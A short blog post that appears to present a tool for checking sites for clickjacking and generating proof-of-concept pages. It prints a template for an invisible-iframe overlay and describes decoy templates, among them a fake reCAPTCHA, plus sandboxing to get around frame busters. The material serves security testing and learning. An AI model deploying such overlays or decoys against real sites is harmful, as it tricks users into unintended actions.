Clickjacker Analyzer and PoC Generator

So, while learning about web vulnerabilities, I learned a bit about clickjacking. It’s a very straightforward vulnerability: if a site can be iframed and the user can commit state-changing actions with a click or a few clicks, then you can trick the user into doing said state-changing actions with a decoy page and an invisble iframe. A classic example of this is the “WIN A PRIZE!” flashy site that required you to click on a button while an iframe with a Facebook page would be over it, right over where the “Like” button would be. It’s so direct, the only HTML code it requires most of the time is the following:

 1<head>
 2	<style>
 3		#target_website {
 4			position:relative;
 5			width:{{some_width}};
 6			height:{{some_height}};
 7			opacity:0.00001;
 8			z-index:2;
 9			}
10		#decoy_website {
11			position:absolute;
12			top:{{decoy_width}};
13			left:{{decoy_height}};
14			z-index:1;
15			}
16	</style>
17</head>
18
19<body>
20	<div id="decoy_website">
21    BIG FLASHY BUTTON HERE!!! CLICK ME!! YOU MUST CLICK ME!!
22	</div>
23	<iframe id="target_website" src="https://vulnerable-website.com">
24	</iframe>
25</body>

Even though it is very straightforward, building a proof of concept for this vulnerability can be a pain since it requires a lot of manual callibration with CSS, as can be seen from the code. For this reason, I built a visual callibrator for easy PoC generation. This way, instead of adjusting CSS, you can adjust the iframe visually right over the decoy button.

Clickjack Analyzer and PoC Generator GIF

Features

Vulnerability analyzer

I’ve included a script that detects if a site is vulnerable to clickjacking by analyzing its HTTP headers. Specifically, its X-Frame-Options and Content-Security-Policy to verify if the site can be framed. Also, it analyzes its cookies to verify if requests generated from a frame are considered valid.

PoC generator

A visual PoC generator where you can drag and resize the iframe with the target site right over the decoy.

Decoy templates

Generic button with customizable text.
Fake reCAPTCHA with failing animation.
Fake redirecting message with hyperlink.

Sandboxing

Allows to sandbox the iframe in order to bypass frame busters.

Conclusions

Overall, I really liked working on this. I learned a lot about HTTP headers, social engineering, Hopefully it’ll be useful for anyone who wants to build a quick PoC for clickjacking.

Check out the source here